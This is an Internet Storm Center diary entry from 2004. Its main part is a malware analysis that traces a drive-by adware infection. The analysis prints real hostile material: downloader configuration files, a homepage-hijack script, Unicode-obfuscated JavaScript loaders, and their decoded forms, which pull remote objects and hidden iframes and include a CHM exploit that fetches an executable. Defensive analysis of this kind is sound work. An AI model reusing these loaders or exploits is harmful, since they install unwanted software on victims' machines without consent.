Threat Level: green Handler on Duty: Xavier Mertens

SANS ISC: InfoSec Handlers Diary Blog - Internet Storm Center Diary 2004-08-23 InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

MS Help For SP2 Setup Problems, The Phishin' Hole, Follow the Bouncing Malware, Part II

Published: 2004-08-23
Last Updated: 2004-08-24 15:13:59 UTC
by Tom Liston (Version: 1)
0 comment(s)
NOTE: We have received reports that McAfee's antivirus product tags this page as containing "Exploit-MhtRedir.gen". The signature for McAfee is triggering on one of the dead-listings of JavaScript on this page. -TL

NOTE#2: I've changed "<>" to "[]" on some of the JavaScript tags to try to avoid the false positives. -TL

What to do for an SP2 "Uh oh?"

How to recover your computer if the WinXP SP2 Setup program is not completed successfully

http://support.microsoft.com/default.aspx?scid=kb;en-us;875355

Applies to:

* Microsoft Windows XP Professional Service Pack 2 (SP2)

* Microsoft Windows XP Home Edition Service Pack 2 (SP2)

* Microsoft Windows XP Media Center Edition Service Pack 2 (SP2)

* Microsoft Windows XP Tablet PC Edition 2005


(Thank you, Jack!)

Gather 'round the Phishin' Hole

If your business is a likely target for a phishing scam, what can you do besides sitting around, waiting to react to the next wave of scams that try to separate your customers from their money? How about taking a look at your weblogs for suspicious referrers?

Many of the phishing sites that we have seen use graphics that are loaded directly from their targets servers. Oftentimes, the site will also redirect a scammed visitor to the real website when the scam has run its course.

If you find a site that is referring to your servers for graphics, it should be a dead giveaway that someone out there probably has a hook in the water.

Watch the referrers on inbound connections to login pages. Create and maintain a database of known-good referrers and use it to remove legitimate references from your referrer logs, and check out the rest. Consider using server side rules to redirect referrals from known phishing sites to special pages explaining to customers that they may have been scammed and what they should be doing.

In all of the time that we've been watching these phishing scams happen, we have yet to see any target that is using the tools and information available to them in an effective way. Phishing scams are not going to go away. It's time that likely targets began to put some thought into limiting their damage.

(Thank you, Swa!)

Follow the Bouncing Malware ? Part II

Note: The links in this part of the diary are purposely not clickable. DO NOT GO TO THESE SITES. THIS MEANS YOU. REALLY.

Welcome back to Part II of our journey through the seamier side of the internet. To those of you who wrote in asking, I?m sorry it took so long to get this put together and up...

In case you missed Part I, or in case you simply want to review, here's a link to where we started:

http://isc.sans.org/diary.php?date=2004-07-23

Go on... I?ll wait.

Ready? Good.

When we last left our intrepid "Joe Average" computer user, he had just installed Windows XP Home Edition, and gone out on the Internet in search of some fun and adventure. If you recall, someone had told him about Yahoo! Games and he wanted to try them out. Using Google, and ignoring (for whatever reason) several obvious links to Yahoo!, he scrolled down near the bottom of the first Google search page and clicked on a link leading to www.yahoogamez.com.

That's when the fun began.

With an IFRAME here and a CHM exploit there, Joe Average?s shiny new computer was transformed into something new... something Joe never dreamed it would become: an S.E.P.

"Somebody Else?s PC."

Huh?

Well, although Joe still owns (letter "o") the hardware, and gets the privilege of supplying it with electricity and an internet connection, someone else now 0wns (zero) his computer, and they?re making all of Joe's bright and shiny hardware dance to a tune that THEY?RE playing.

You see: All Joe wants his hardware to do is stop all of this nonsense and leave him in peace to play a rousing round of "Donut Boy 2" from the yahoogamez site. But the new happy-go-lucky pals that he's picked up while browsing have some other things in mind...

When I paused our adventure at the end of Part I, the list of "stuff" done to Joe's computer looked like this:

1) Joe's homepage had been changed. It is now set to:

http://default-homepage-network.com/start.cgi?new-hkcu

2) The default search page has been set to:

http://server224.smartbotpro.net/7search/?new-hkcu

3) Search assist has been turned off.

4) "TV Media Display" has been installed on Joe's machine (more on this later.)

5) addictivetechnologies.net had graced Joe's machine with a file identified by AV software as Win32/TrojanDownloader.Rameh.C.

So... what do Joe Average's new found buddies have planned for him next? Let's find out together as we continue to follow the bouncing malware.

Let's start by taking a look inside the file that Addictive Technologies "gave" to Joe. If you?ll recall, it was a .cab file called "fr03tp.cab," containing two files:

ATPartners.inf ? 403 bytes

ATPartners.dll ? 96,256 bytes

(Some editorializing: The ATPartners.dll contains a statically linked copy of the MSVC runtime. This is completely unnecessary. Addictive Technologies: If you're going to write malware, at least write EFFICIENT malware.)

Looking at the strings contained within the .dll file, we find some interesting stuff:

/F1/Cmd4F1_fr03t.txt
www.f1organizer.com
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects


And some downright bizarre stuff:

Hara Hara Mahadev !!!
tum agar badshah hai to hum eespeek ka yekka!


(Would anyone care to enlighten me?)

Putting some obvious "stuff" from that list together, we get ourselves a URL:

http://www.f1organizer.com/F1/Cmd4F1_fr03t.txt

where we find the following interesting message:

[NextConfigFile]
Server=www.f1organizer.com
Object=/F1/audit/DMOnewSB/Cmd4F1_fr03t_Upd3.txt

[AddF1]
Folder=AT-Games
Link=http://www.gamehouse.com/affiliates/template.jsp?AID=2226
Name=Gamehouse Games

[AddF2]
Folder=AT-Games
Link=http://www.regnow.com/softsell/visitor.cgi?affiliate=24998&action=site&vendor=7551
Name=Big Fish Games

[AddF3]
Folder=AT-Games
Link=http://www.regnow.com/softsell/visitor.cgi?affiliate=24998&action=site&vendor=7834
Name=FlyorDie Games

[AddF4]
Folder=..\\Desktop\\
Link=http://www.007arcadegames.com
Name=007arcadegames.com
IconFile=http://www.007arcadegames.com/007.ico
IconIndex=0

[UpdateList]
Server1=www.f1organizer.com
Object1=/F1/objects/ezbdlLs.dll
InstallName1=bdlds.dll
RepURL1=http://www.f1organizer.com/F1/audit/Ack/Ack4Freeze.htm

Server2=www.AddictiveTechnologies.net
Object2=/LoadShare/SplWbr.dll
InstallName2=SplWbr.dll
RepURL2=http://www.f1organizer.com/F1/audit/Ack/Ack4SB2.htm


(Is it just me, or did anyone else find the term "softsell" in the above "RegNow" URLs more than a bit amusing?)

Hey look! More stuff was "updated" on Joe's computer: Let's see... They're adding some stuff to Joe's Internet "Favorites" to advertise purchase links for games that AT gets affiliate bucks for (Gamehouse Games, Big Fish Games, and FlyorDie Games), they've added a link on Joe's Desktop to "007arcadegames," and they're downloading more gifts for Joe: ezbdlLs.dll and SplWbr.dll.

SplWbr.dll weighs in at a whopping 454,656 bytes and is what is known in the AntiVirus biz as a "file dropper." That is, when it is executed, it writes out and installs or executes one or more files that are attached to it as data. In this case, it drops out two files:

Drop#1 ? 135,088 bytes which claims to be "Ad Destroyer and Virtual Bouncer Installation" and is digitally signed by Spyware Labs, Inc. (www.spywarelabs.com).

Drop#2 ? 302,544 bytes which silently installs "TopRebates.com AutoTrack software" (www.toprebates.com).

ezbdlLs.dll is a 151,040 byte UPX compressed .dll that expands to 176,128 bytes when uncompressed. It too is a file dropper, gracing Joe's machine with three new gifts:

Drop#1 ? 65,536 bytes of ASPacked goodness from www.abetterinternet.com which claims to be a "[u]tility for downloading files and upgrading software. Visit www.abetterinternet.com for more info."

Drop#2 ? 33,280 bytes of UPX packed fun which expands into 65,536 bytes of crappy software engineering from the fine folks at ezULA (www.ezula.com) who?s stated goal is "Making Your Internet Browsing Simple, Exciting, and Personal." Uh... no thank you.

Drop#3 ? 65,024 bytes filled with a NullSoft Installer that gifts Joe's machine with SAHAgent, a Winsock2 Layered Service Provider (LSP) that installs itself in Joe's WinSock stack, much like a personal firewall. SAHAgent redirects select web traffic to cause online purchases made by Joe to be done in a way that will route any affiliate bucks to a specific affiliate ID.

So, what's the upshot of this whole mess? Well, Joe has had five new software packages installed onto his machine, redirecting his browsing, his searching, and his online purchases to suit the desires of the (no-doubt ;-) fine, upstanding people at ATPartners. His Internet browsing will now be "Simple, Exciting, and Personal" (ezula), he?ll always know that "The Best Downloads are Free" (abetterinternet), his computer will show him the "Smart way to put money in your pocket" (TopRebates) and he needn?t worry about adware/spyware any more because Virtual Bouncer has been installed to... uh... bounce it (Spyware Labs). Oh, and his online purchases will earn money for... uh... um.... someone. (SAHAgent). Joe should be so very, very happy.

But did you happen to notice THIS section in the text-file o' instructions that the ATPartners.dll downloaded?

[NextConfigFile]
Server=www.f1organizer.com
Object=/F1/audit/DMOnewSB/Cmd4F1_fr03t_Upd3.txt


Next time around, we?re going to download a DIFFERENT set of "configuration" instructions:

[NextConfigFile]
Server=www.f1organizer.com
Object=/F1/audit/DMOnewSB/Cmd4F1_fr03t_Upd3.txt

[UpdateList]
Server1=www.f1organizer.com
Object1=/F1/objects/msbb693.dll
InstallName1=msbb321.dll
RepURL1=http://www.f1organizer.com/F1/audit/Ack/Ack4F1_nCase321.htm

Server2=www.f1organizer.com
Object2=/F1/objects/ezbdlLs.dll
InstallName2=bdlds.dll
RepURL2=http://www.f1organizer.com/F1/audit/Ack/Ack4Freeze.htm

Server3=www.f1organizer.com
Object3=/F1/objects/W2020Setup.dll
InstallName3=W2020Setup.dll
RepURL3=http://www.f1organizer.com/F1/audit/Ack/Ack4F1_Cls.htm

Server4=www.f1organizer.com
Object4=/F1/objects/MyDailyHoroscope.dll
InstallName4=MyDailyHoroscope.dll
RepURL4=http://www.f1organizer.com/F1/audit/Ack/Ack4F1_Cls.htm

Server-4=www.f1organizer.com
Object-4=/F1/objects/ezStD.dll
InstallName-4=ezStub3.dll
RepURL-4=http://www.f1organizer.com/F1/audit/Ack/Syn4F1_eZula.htm

Server-6=www.f1organizer.com
Object-6=/F1/objects/MoreResultsSetup.dll
InstallName-6=MoreResultsSetup.dll
RepURL-6=http://www.f1organizer.com/F1/audit/Ack/Ack4F1_Cls.htm

Server-3=www.f1organizer.com
Object-3=/F1/objects/KVIF_11.dll
InstallName-3=KVIF_11.dll
RepURL-3=http://www.f1organizer.com/F1/audit/Ack/Syn4F1_KVI.htm


Just looking at that list makes me tired. (And the name "ezStD" makes me laugh? For those non-English speakers out there, STD is an acronym for "Sexually Transmitted Disease" :-) I could slog down through the whole sorry mess, and perhaps I will if there is enough interest, but for now let's take a look at another area where Joe is no longer the 0wner of his P.C.: his homepage.

Joe's homepage was changed in the initial "drive-by" to be "http://default-homepage-network.com/start.cgi?new-hkcu". The next time that Joe fires up IE, here?s what he gets (suitably edited to remove superfluous crud):

<html><head>
<title>Default Homepage Network</title>
</head>
<body>
[script language=javascript]
<!--
var agt=navigator.userAgent.toLowerCase();
var is_ie = (agt.indexOf("msie") != -1);
var is_aol = (agt.indexOf("aol") != -1);

if (!is_aol) {
self.moveTo(0,0);
self.resizeTo(screen.availWidth,screen.availHeight);
}
location.href="http://default-homepage-network.com/newspynotice.html"
if (!is_aol) {
var expdate = new Date((new Date()).getTime() + 600000);
if (document.cookie.indexOf("delayed") == -1) {
document.cookie=
"delayed=general; expires=" + expdate.toGMTString() + "; path=/;";
splashWin2 = window.open("",'y','fullscreen=1,toolbar=0,location=0,\
directories=0,status=0,menubar=0,scrollbars=0,resizable=0');
splashWin2.blur();
window.focus();
splashWin2.resizeTo(10,10);
splashWin2.moveTo(5000,5000);
splashWin2.location="http://object.passthison.com/aff/delayed/";
window.focus();
}
}
//-->
[/script]</body>


The referenced file, "newspynotice.html," is another rather interesting little gem. It displays a big red stop sign, and explains that poor Joe?s computer may be infected with spyware. Has Joe noticed that his home page has been changed? (Well, duh!) Has his computer been acting "wierd" lately? (Why can?t these malware clowns spell?) Is the Internet "running slow or crashing?" If so, Joe simply needs to click on a link on the page and his "computer will be back to normal and secure again in just a few minutes." Oh, joy... oh, joy.
But, hidden within the HTML of this ?IMPORTANT SECURITY NOTICE!? page is a little surprise:

<!-- 1. newobj1 -->

[script type="text/javascript"]document.write('\u003c\u0073\u0063\u0072\u0069\u0070
\u0074\u0020\u006c\u0061\u006e\u0067\u0075\u0061\u0067\u0065\u003d\u006a
\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u000d\u000a
\u0076\u0061\u0072\u0020\u006f\u0050\u006f\u0070\u0075\u0070\u0020\u003d
\u0020\u0077\u0069\u006e\u0064\u006f\u0077\u002e\u0063\u0072\u0065\u0061
\u0074\u0065\u0050\u006f\u0070\u0075\u0070\u0028\u0029\u003b\u000d\u000a
\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0073\u0068\u006f
\u0077\u0050\u006f\u0070\u0075\u0070\u0028\u0029\u000d\u000a\u007b\u000d
\u000a\u0009\u006f\u0050\u006f\u0070\u0075\u0070\u002e\u0064\u006f\u0063
\u0075\u006d\u0065\u006e\u0074\u002e\u0062\u006f\u0064\u0079\u002e\u0069
\u006e\u006e\u0065\u0072\u0048\u0054\u004d\u004c\u0020\u003d\u0020\u0022
\u003c\u006f\u0062\u006a\u0065\u0063\u0074\u0020\u0064\u0061\u0074\u0061
\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u006f\u0062\u006a\u0065
\u0063\u0074\u002e\u0070\u0061\u0073\u0073\u0074\u0068\u0069\u0073\u006f
\u006e\u002e\u0063\u006f\u006d\u002f\u0076\u0075\u0030\u0038\u0033\u0030
\u0030\u0033\u002f\u006e\u0065\u0077\u006f\u0062\u006a\u0065\u0063\u0074
\u0031\u002e\u0063\u0067\u0069\u003e\u0022\u003b\u000d\u000a\u0009\u006f
\u0050\u006f\u0070\u0075\u0070\u002e\u0073\u0068\u006f\u0077\u0028\u0030
\u002c\u0030\u002c\u0031\u002c\u0031\u002c\u0064\u006f\u0063\u0075\u006d
\u0065\u006e\u0074\u002e\u0062\u006f\u0064\u0079\u0029\u003b\u000d\u000a
\u007d\u000d\u000a\u0073\u0068\u006f\u0077\u0050\u006f\u0070\u0075\u0070
\u0028\u0029\u003b\u000d\u000a\u003c\u002f\u0073\u0063\u0072\u0069\u0070
\u0074\u003e')[/script]

<!-- 2. e1 -->

[script type="text/javascript"]document.write('\u003c\u0069\u0066\u0072\u0061\u006d
\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a
\u002f\u002f\u0036\u0039\u002e\u0035\u0030\u002e\u0031\u0033\u0039\u002e
\u0036\u0031\u002f\u0068\u0070\u0031\u002f\u0068\u0070\u0031\u002e\u0068
\u0074\u006d\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020
\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u003e\u003c\u002f\u0069
\u0066\u0072\u0061\u006d\u0065\u003e')[/script]


A little decoding gives us Part 1:


[script language=javascript]
var oPopup = window.createPopup();
function showPopup() {
oPopup.document.body.innerHTML = "<object\
data=http://object.passthison.com/vu083003/newobject1.cgi>";
oPopup.show(0,0,1,1,document.body);
}
showPopup();
[/script]


And Part 2:

[iframe src="http://69.50.139.61/hp1/hp1.htm" width=1 height=1][/iframe]


This recalls the hp2.htm file that was downloaded and installed in Part I of this epic adventure. Same site, same method, same result:

<!-- NEW Z.D.E.-D.B.D. w/ vu083003-H.P.S. (c) April 2004 SmartBot -->

[script type="text/javascript"]document.write('\u003c\u0074\u0065\u0078\u0074\u0061
\u0072\u0065\u0061\u0020\u0069\u0064\u003d\u0022\u0063\u006f\u0064\u0065
\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073
\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u003b\u0022\u003e
\u000d\u000a\u0020\u0020\u0020\u0020\u003c\u006f\u0062\u006a\u0065\u0063
\u0074\u0020\u0064\u0061\u0074\u0061\u003d\u0022\u0026\u0023\u0031\u0030
\u0039\u003b\u0073\u002d\u0069\u0074\u0073\u003a\u006d\u0068\u0074\u006d
\u006c\u003a\u0066\u0069\u006c\u0065\u003a\u002f\u002f\u0043\u003a\u005c
\u0066\u006f\u006f\u002e\u006d\u0068\u0074\u0021\u0024\u007b\u0050\u0041
\u0054\u0048\u007d\u002f\u0048\u0050\u0031\u002e\u0043\u0048\u004d\u003a
\u003a\u002f\u0068\u0070\u0031\u002e\u0068\u0074\u006d\u0022\u0020\u0074
\u0079\u0070\u0065\u003d\u0022\u0074\u0065\u0078\u0074\u002f\u0078\u002d
\u0073\u0063\u0072\u0069\u0070\u0074\u006c\u0065\u0074\u0022\u003e\u003c
\u002f\u006f\u0062\u006a\u0065\u0063\u0074\u003e\u000d\u000a\u003c\u002f
\u0074\u0065\u0078\u0074\u0061\u0072\u0065\u0061\u003e\u000d\u000a\u000d
\u000a\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u006c\u0061\u006e
\u0067\u0075\u0061\u0067\u0065\u003d\u0022\u006a\u0061\u0076\u0061\u0073
\u0063\u0072\u0069\u0070\u0074\u0022\u003e\u000d\u000a\u0020\u0020\u0020
\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0077\u0072
\u0069\u0074\u0065\u0028\u0063\u006f\u0064\u0065\u002e\u0076\u0061\u006c
\u0075\u0065\u002e\u0072\u0065\u0070\u006c\u0061\u0063\u0065\u0028\u002f
\u005c\u0024\u007b\u0050\u0041\u0054\u0048\u007d\u002f\u0067\u002c\u006c
\u006f\u0063\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072\u0065\u0066
\u002e\u0073\u0075\u0062\u0073\u0074\u0072\u0069\u006e\u0067\u0028\u0030
\u002c\u006c\u006f\u0063\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072
\u0065\u0066\u002e\u0069\u006e\u0064\u0065\u0078\u004f\u0066\u0028\u0027
\u0068\u0070\u0031\u002e\u0068\u0074\u006d\u0027\u0029\u0029\u0029\u0029
\u003b\u000d\u000a\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e
\u000d\u000a\u000d\u000a')[/script]


Once again, this isn?t difficult to decode, and results in:

<textarea id="code" style="display:none;">
[object data="&#109;s-its:mhtml:file://C:\foo.mht!${PATH}/HP1.CHM::/hp1.htm"\
type="text/x-scriptlet"][/object]
</textarea>
[script language="javascript"]
document.write(code.value.replace(/\${PATH}/g,location.href.substring\
(0,location.href.indexOf('hp1.htm'))));
[/script]


Another .chm exploit that will eventually result in the download and execution of a file called hp1.exe.

Here we go again... and trust me, hp1.exe is a real piece of work.

Stay tuned for Part III...

Note: When I first started writing this up, I was completely unaware of how deeply down the rabbit hole it would take me. I honestly believed that it would only be a fairly long diary entry... then two fairly long diary entries... and now it is obvious that we?re heading into three parts at the very least. I?ll try to get Part III (and any other remaining posts) up more quickly.
------------------------------------------------------------------------

Handler on Duty: Tom Liston ( http://www.labreatechnologies.com )
Keywords:
0 comment(s)
Diary Archives